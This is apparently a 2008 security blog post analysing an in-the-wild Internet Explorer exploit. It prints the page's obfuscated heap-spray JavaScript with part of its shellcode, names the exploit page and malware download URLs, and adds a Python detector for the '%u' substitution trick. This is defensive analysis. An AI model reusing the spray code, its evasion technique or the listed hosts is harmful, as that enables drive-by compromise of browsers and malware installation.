12/14/2008
another IE exploit and evasion in the wild
hackers are like wolves: when they see the meat, they all come after it, so don't be surprised
vip.4s3w.cn/vip/I7.htm
another IE exploit, but this evasion technique is so cute; take a look:
[snip]
function spray(sc){
    // evasion: the shellcode string carries "cuteqqcn" wherever "%u" belongs;
    // "\x25\x75" is "%u", so the swap back happens only at runtime, right before unescape()
    var infect=unescape(sc.replace(/cuteqqcn/g,"\x25\x75"));
    var CuteSize=0x100000;
    var cuteLoadSize=infect.length*2;
    var szlong=CuteSize-(cuteLoadSize+0x038);
    var retVal=unescape("%u0a0a%u0a0a");
    retVal=getSampleValue(retVal,szlong);
    aaablk=(0x0a0a0a0a-0x100000)/CuteSize;
    zzchuck=new window['Array']();
    // fills an array with identical padding+shellcode blocks (the spray)
    for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}
function getSampleValue(retVal,szlong){
    // doubles the padding string until it is long enough, then trims it
    while(retVal.length*2<szlong){retVal+=retVal}
    retVal=retVal.substring(0,szlong/2);
    return retVal
}
var a1="cuteqqcn";
spray("cuteqqcn9090cuteqqcn9090cuteqqcn9090"+a1+"6090cuteqqcn17ebcuteqqcn645ecuteqqcn30a1cuteqqcn0000cuteqqcn0500cuteqqcn0800cuteqqcn0000cuteqqcnf88bcuteqqcn00b9cuteqqcn0004cuteqqcnf300[snip]
Well... maybe not that cute: it is just trying to evade detection by replacing every %u in the shellcode string with "cuteqqcn" and swapping it back at runtime, right before unescape().
Anyway, the shellcode will download malware from
www-onlinedown.com/ie7/DUMete.exe (VT result)
and the number of virus checkers not finding it is encouraging....
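Because the token only becomes "%u" at runtime, a scanner that greps the page for "%u"-encoded shellcode sees nothing. The following is an added example, not code from the original post: a small Python normaliser that statically recognises the .replace(/token/g, "\x25\x75") idiom, puts the "%u" back, and then runs a few spray heuristics over the result. The indicator names, thresholds and the sample script are my own constructions (the sample mirrors the page's structure but its "payload" is NOP bytes plus two filler words, not shellcode).

```python
"""Static normaliser for the "%u"-substitution trick used by obfuscated
heap sprays (added example, not the original post's code)."""
import re

# .replace(/TOKEN/g, "LITERAL") with either quote style
REPLACE_CALL = re.compile(r'\.replace\(\s*/([^/]+)/g\s*,\s*(["\'])(.*?)\2\s*\)')
UNICODE_ESCAPE = re.compile(r'%u([0-9a-fA-F]{4})')
ESCAPE_RUN = re.compile(r'(?:%u[0-9a-fA-F]{4})+')

# Heuristics that tend to travel with a heap spray (names are ours).
INDICATORS = {
    # 0x0a0a0a0a is the constant on the page; the other two are common choices
    "spray_address": re.compile(r'0x(0a0a0a0a|0c0c0c0c|0d0d0d0d)', re.I),
    "string_doubling": re.compile(r'(\w+)\s*\+=\s*\1\b'),            # s += s
    "array_fill_loop": re.compile(r'for\s*\([^)]*\)\s*\{[^}]*\[\s*\w+\s*\]\s*='),
    "unescape_of_rewritten_string": re.compile(r'unescape\(\s*\w+\.replace\('),
}

# Constructed sample: same shape as the page's spray, NOP bytes only.
SAMPLE_JS = r'''
function spray(sc){var infect=unescape(sc.replace(/cuteqqcn/g,"\x25\x75"));
var CuteSize=0x100000;var szlong=CuteSize-(infect.length*2+0x038);
var retVal=unescape("%u0a0a%u0a0a");
while(retVal.length*2<szlong){retVal+=retVal}
var blocks=(0x0a0a0a0a-0x100000)/CuteSize;var heap=new window['Array']();
for(i=0;i<blocks;i++){heap[i]=retVal+infect}}
spray("cuteqqcn9090cuteqqcn9090cuteqqcn9090cuteqqcn6090cuteqqcn17eb");
'''


def decode_js_literal(s):
    """Resolve \\xHH and \\uHHHH escapes inside a JS string literal."""
    s = re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)


def find_substitution_tokens(js):
    """Map each regex token to its decoded replacement, keeping only the
    calls whose replacement is a percent-encoding prefix such as "%u"."""
    tokens = {}
    for token, _quote, literal in REPLACE_CALL.findall(js):
        replacement = decode_js_literal(literal)
        if replacement.startswith('%'):
            tokens[token] = replacement
    return tokens


def normalise(js):
    """Apply every recovered substitution to the whole source so the
    shellcode string reads as ordinary %uXXXX escapes (the JS token is
    used directly as a Python regex, which is fine for plain words)."""
    for token, replacement in find_substitution_tokens(js).items():
        js = re.sub(token, lambda _m, r=replacement: r, js)
    return js


def decode_escape_run(run):
    """Turn one %uXXXX run into the bytes unescape() would produce: every
    %u word is a UTF-16 code unit, stored little-endian in memory."""
    return b''.join(int(h, 16).to_bytes(2, 'little')
                    for h in UNICODE_ESCAPE.findall(run))


def analyse(js):
    """Report recovered tokens, escape count, leading payload bytes, the
    indicators that fired and a coarse verdict for one script."""
    tokens = find_substitution_tokens(js)
    plain = normalise(js)
    runs = ESCAPE_RUN.findall(plain)
    payload = decode_escape_run(max(runs, key=len)) if runs else b''
    fired = [name for name, rx in INDICATORS.items() if rx.search(plain)]
    return {
        'tokens': tokens,
        'unicode_escapes': len(UNICODE_ESCAPE.findall(plain)),
        'payload_hex': payload.hex(),
        'nop_sled_bytes': len(payload) - len(payload.lstrip(b'\x90')),
        'indicators': fired,
        'likely_heap_spray': bool(tokens) and len(fired) >= 2 and len(payload) >= 8,
    }


if __name__ == '__main__':
    import json
    print(json.dumps(analyse(SAMPLE_JS), indent=2))
```

The verdict is deliberately coarse: the substitution alone is just obfuscation, so the script only flags when the restored "%u" payload is accompanied by at least two of the spray tells (a spray-sized address constant, string doubling, an array-fill loop, unescape() applied to a rewritten string). Swap in a different token or a "\\x25" replacement and the same code still resolves it, which is the point of normalising before matching.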
23:00